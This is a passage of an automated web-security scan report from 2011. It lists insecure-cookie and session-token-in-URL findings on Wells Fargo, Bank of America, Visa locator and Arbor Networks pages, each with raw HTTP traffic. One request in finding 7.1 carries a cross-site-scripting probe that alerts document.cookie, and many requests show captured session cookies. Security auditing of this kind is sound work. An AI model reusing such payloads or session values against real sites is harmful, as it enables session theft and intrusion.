User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Content-length: 11102
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=6TvRNJhY125zTwF4f6Qfyy7MFhjnl1ynTFX1D79WTJGDGWP1JHHW!1758734416; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2230606602.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Student Loans, College
...[SNIP]...

6.167. https://www.wellsfargo.com/student/loans/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /student/loans/apply

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /student/loans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:45 GMT
Location: https://www.wellsfargo.com/student/apply
Set-Cookie: wcmcookiewf=Pvs8NJhZRksHLhJMnlf8LRvg31mfhM3JhG2tbcvt12x61nL1LDcq!854257767; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2180274954.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com/student
...[SNIP]...

6.168. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Origin: https://www.wellsfargo.com
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB; JSESSIONID=A063DC75E80493714CD441148D97EDA0; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER
Content-Length: 312

ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&default=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECO
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:01:02 GMT
Content-type: text/html
Set-cookie: TCID=0007ae71-98bc-bd52-84ae-888500000049;Domain=.wellsfargo.com;Expires=Fri, 01-Feb-2013 22:01:02 GMT;Path=/
Set-cookie: NSC_XfmmtGbshp4=445b327f7863;Domain=.wellsfargo.com;Expires=Thu, 03-Feb-2011 02:01:02 GMT;Path=/
Content-Length: 0


6.169. https://www.wellsfargo.com/theprivatebank/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /theprivatebank/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /theprivatebank/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 10631
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=STpMNJhQDybSSxHpfhJTFJbY0kNSfpnGW0Fr1nv1mPTTvFqV112n!805790998; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2499042058.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>The Private Bank - Wea
...[SNIP]...

6.170. https://www.wellsfargo.com/wachovia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3SppNJhcnv0hcQFv6dfXLt0v608QpNnhXmnDLfJKH2M4Rnc1Bvrg!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

6.171. https://www.wellsfargo.com/wachovia/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 9975
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=PTvJNJhcrLjppxSd5CbQ8FhVRPVSLn2Kfk1RZTbVT3krLTx1rHxF!-1341910901; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2381601546.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo and Wachov
...[SNIP]...

6.172. https://www.wellsfargo.com/wachovia/autoloans/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/autoloans/index

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/autoloans/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:12 GMT
Content-length: 4590
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=xppZNJhY7LvrJcpTHmP3cLJpZ1LLPmJkQcPqxfFd8Jckb76K9Gqk!457746116; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.173. https://www.wellsfargo.com/wachovia/insurance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/insurance

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/insurance HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:13 GMT
Content-length: 5083
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=HytTNJhZ4qF17hkd05bFxvjm5pjLJZ9SDp232hnZzlBSfDqphjTm!524336973; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2666814218.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java
...[SNIP]...

6.174. https://www.wellsfargo.com/wachovia/wealthmanagement/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wachovia/wealthmanagement/index

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wachovia/wealthmanagement/index HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:16 GMT
Content-length: 4878
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=dxGyNJhbxRKXvmT8XrCKRL6C9YBQ3p3ySlqlWCRgYtL9pkZny1NT!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wachovia to Wells Fargo Inter
...[SNIP]...

6.175. https://www.wellsfargo.com/wf/product/apply  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wf/product/apply

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wf/product/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:59 GMT
X-Cnection: close
Location: https://www.wellsfargo.com:443/customerApp/product/apply
Set-Cookie: wcmcookiewf=s4dGNJhHTLYKQd31wnpL6N3j4P7bSHpcqpvSv2FCsqkGdJJv959t!457746116; domain=.wellsfargo.com; path=/; secure
Content-Language: en
Set-Cookie: ISD_WCM_COOKIE=2062834442.16927.0000; path=/
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://www.wellsfargo.com:443/cus
...[SNIP]...

6.176. https://www.wellsfargo.com/wfonline/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wfonline/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wfonline/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:31 GMT
Content-length: 10682
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=LFLMNJhLFspBQNbCyRYTSn9pmtPgVnCyNmJyyp061QdHMd9nSSHJ!-231273820; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2113166090.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Online</ti
...[SNIP]...

6.177. https://www.wellsfargo.com/wfonline/bill_pay/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wfonline/bill_pay/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wfonline/bill_pay/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:32 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Online - Bill Pay<
...[SNIP]...

7. Session token in URL  previous  next
There are 8 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://textchat.bankofamerica.com/hc/44850650/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://textchat.bankofamerica.com
Path:   /hc/44850650/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/44850650/?&site=44850650&cmd=mTagStartPage&lpCallId=87607160443-852770821656&protV=20&lpjson=1&page=http%3A//www.retirement.merrilledge.com/IRA/pages/home.aspx%3F%25009627c%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eac0806a009c%3D1&id=7538435277&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-MLDIra-english&activePlugin=none&cobrowse=true&PV%21unit=MLDIra&PV%21section=Home&PV%21ConversionStage=Home&PV%21Session%20ID=689c136b798e446897d1c2e0184bb0f5&PV%21pageLoadTime=35%20sec&PV%21visitorActive=1&SV%21language=english&title=The%20Big%20Picture%20on%20IRAs%20%7C%20Merrill%20Edge%20Retirement&referrer=http%3A//burp/show/16&cookie=SMIDENTITY%3DpD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX%2BxQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg%2BL0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa%2BZu0fT4K1i/%2B8UG4BntMDKs6xA/EgABaMXNP6xhj%2BXNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd%2B5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4%2BBNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI%2BSKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi%2Be1CLIx23wojYb%2BxRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd%3B%20pxs%3D689c136b798e446897d1c2e0184bb0f5%3B%20pxv%3D4B1B9E90-7DD2-4095-A535-9FE88031C408%3B%20CMAVID%3Dnone%3B%20cmTPSet%3DY HTTP/1.1
Host: textchat.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7079962972640756695; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmTPSet=Y; TCID=0007ae71-9ad3-3b5c-9719-884700000028; NSC_CbolPgBnfsjdb=445b32097852; throttle_value=21; LivePersonID=LP i=7110426980824,d=1296685294; HumanClickACTIVE=1296685294535

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:21:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-7110426980824-1296685295:0; expires=Thu, 02-Feb-2012 22:21:35 GMT; path=/hc/44850650
Set-Cookie: HumanClickKEY=7079962972640756695; path=/hc/44850650
Set-Cookie: HumanClickSiteContainerID_44850650=STANDALONE; path=/hc/44850650
Set-Cookie: LivePersonID=-7110426980824-1296685295:-1:-1:-1:-1; expires=Thu, 02-Feb-2012 22:21:35 GMT; path=/hc/44850650
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Wed, 02 Feb 2011 22:21:35 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1997

lpConnLib.Process({"ResultSet": {"lpCallId":"87607160443-852770821656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton(
...[SNIP]...

7.2. http://visa.via.infonow.net/usa_atm/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://visa.via.infonow.net
Path:   /usa_atm/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /usa_atm/ HTTP/1.1
Host: visa.via.infonow.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.29
Set-Cookie: JSESSIONID=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1; Path=/usa_atm
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL', policyref="http://visa.via.infonow.net/w3c/p3p.xml"
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 29339


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<
...[SNIP]...
<a class="thumbnailEnlarge"><img src="/usa_atm/images/phone1.jpg;jsessionid=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1" height="50" border="0" alt=""><span><img src="/usa_atm/images/phone2.jpg;jsessionid=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1" border="0" alt=""></span>
...[SNIP]...
<input type="hidden" name="" value="TRUE">

<img src="/usa_atm/images/icon_24hr.gif;jsessionid=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1">
24-Hour Access<BR>
...[SNIP]...
<input type="hidden" name="" value="TRUE">

<img src="/usa_atm/images/icon_handi.gif;jsessionid=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1">
Wheelchair Access<BR>
...[SNIP]...
<input type="hidden" name="" value="TRUE">

<img src="/usa_atm/images/icon_braille.gif;jsessionid=33F62CE6BCF5B9E517DCE6E5A1E28B7D.fta-web1" border="0">
Braille<BR>
...[SNIP]...

7.3. http://www.arbornetworks.com/contact  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.arbornetworks.com
Path:   /contact

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1aff6b01abd27afdd96fe0d2ad40b22b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:36 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<link href='http://www.arbornetworks.com/components/com_securityimages/securityimages.css' rel='stylesheet' type='text/css'/><img src='http://www.arbornetworks.com/components/com_securityimages/plugins/core/1.1/imageGenerator.php?refid=430676c291d53f0c137a6af08cedc7a54c3d3abe&amp;size=&amp;sessionid=68a202e1a5cc93aaa19630ecb49b46a8' title='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' alt='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' id='PFSecurity' name='PFSecurity' border='0'><a href="javascript:SecurityImagesNew('PFSecurity','PFSecurity_try', 'PFSecurity_reload');" id='askNewPicture' title='Ask a new picture' alt='Ask a new picture'>
...[SNIP]...

7.4. http://www.arbornetworks.com/en/partnership-inquiry-form.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.arbornetworks.com
Path:   /en/partnership-inquiry-form.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6c13678309361756ea6d2a07221682c2; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:52:04 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


